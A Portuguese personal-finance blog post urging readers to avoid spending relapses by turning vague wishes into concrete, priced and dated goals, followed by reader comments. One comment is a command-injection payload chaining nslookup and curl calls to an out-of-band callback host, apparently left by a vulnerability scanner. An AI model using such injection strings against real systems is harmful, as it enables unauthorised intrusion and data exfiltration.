Sabe por quê a gente tem recaídas muitas vezes? Porque não está claro para a gente qual é o motivo de a gente organizar as finanças. A gente sabe que tem que organizar, a gente sabe que não quer mais viver nesse caos, a gente sabe que não quer sentir mais essa sensação ruim ter gasto a mais, mas não tem um motivo concreto.

O que é um motivo concreto? Olha só, se tivesse uma viagem marcada para daqui a 4 meses para,sei lá, Fernando de Noronha, você já sabe que você vai. Então, você precisa tero dinheiro para viajar. Aí, na hora de passar o cartão, você ia falar assim:“Poxa, vou passar meu cartão agora ou eu vou ter dinheiro para a viagem?”. Cara, agente não passa! Por quê?Porque tem um motivo.Tem um motivo para a gente não passar o cartão ali.

Eu vou em um restaurante supercaro ou vou pedir uma pizza em casa? Porque se eu pedir a pizza em casa vai sobrar mais dinheiro para eu ir no restaurante super caro da viagem. Eu vou aproveitar mais a minha viagem se eu não for para esse restaurante supercaro hoje e ficar em casa comendo uma pizza de padaria.Então, assim,precisa ter um motivo!

Mas não é um motivo assim…

-“Ah, não, Lu,mas eu tenho motivo. Eu quero comprara minha casa”.
-Ah,beleza, qual é a casa?
-“Ah, não sei, não vi ainda”
-Aonde é?
-“Ah, não sei, nem pesquisei”
-Quanto é?
-“Ah, é muito dinheiro,nem sei se eu vou ter.”

Isso não é um motivo! Olha só, você não sabe de nada! Aí não sabe de nada,para que você vai deixar de ir a um restaurante para comprar uma casa que você nem sabe quando vai comprar, quanto vai custar…você não para de gastar! Entende? Para agente não ter recaída, para a gente conseguir dominar as nossas finanças, precisa ter um motivo claro para a gente fazer isso!

Então pega os seus desejo se transforma em objetivos. Precisa ter número,você precisa dizer quanto custa, você precisa dizer qual é o prazo, quando você vai realizar esse objetivo. Enquanto você não dá número para o seu desejo, ele é só uma vontadezinha.

Agora, se você pega essa vontadezinha e transforma em um objetivo e a dizer… “Eu preciso de tantos mil,até a data tal, até lá eu vou economizar tantos por mês…Se você fizer isso,ninguém te segura! Se for uma coisa que você quer mesmo, ninguém te segura!

Você vai dar um jeito de ganhar mais! Você vai dar um jeito de economizar! Você vai pegar esse cartão e enfiar na gaveta e não vai mexer mais! Ou vai até quebrar! Eu sei de gente que quebra cartão! Você vai dar um jeito em não ter recaída! Então você precisa de um motivo!

 

9 respostas

  1. ;(nslookup -q=cname hitcxegbtwtcw81c26.bxss.me||curl hitcxegbtwtcw81c26.bxss.me)|(nslookup -q=cname hitcxegbtwtcw81c26.bxss.me||curl hitcxegbtwtcw81c26.bxss.me)&(nslookup -q=cname hitcxegbtwtcw81c26.bxss.me||curl hitcxegbtwtcw81c26.bxss.me)

  2. tenho acompanhado seus videos no instagram e fiquei com uma dúvida.
    Você diz aos alunos que é interessante o seu nome ficar sujo, no intuito de voce nao poder se endividar mais, mas quando vc precisa ter o cpf limpo para comprar os itens de trabalho para obter uma renda.

    1. Emilie, eu acompanho a Lu há bastante tempo e entendo que ela não acha interessante que o aluno tenha o nome sujo, mas ela explica que quando o seu nome já está sujo, acaba sendo algo bom por você ficar impedido de fazer mais dívidas. Ela sempre ressalta que o nome sujo é um sintoma, mas que temos que tratar o problema que nós levou ao caos financeiro. Se você está mega endividada e precisa comprar itens de trabalho, não é bom fazer mais dividas para isso. Penso que seria interessante fazer uma renda extra, para ir quitando as dividas e junto a isso fazer sua fotografia e rota financeira e colocar esses gastos com esses itens.
      Como renda extra, sugiro que venda algo que você tenha em casa e não usa muito. Esse mês vendi algumas roupas que não usava e alguns livros.
      Espero ter ajudado

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *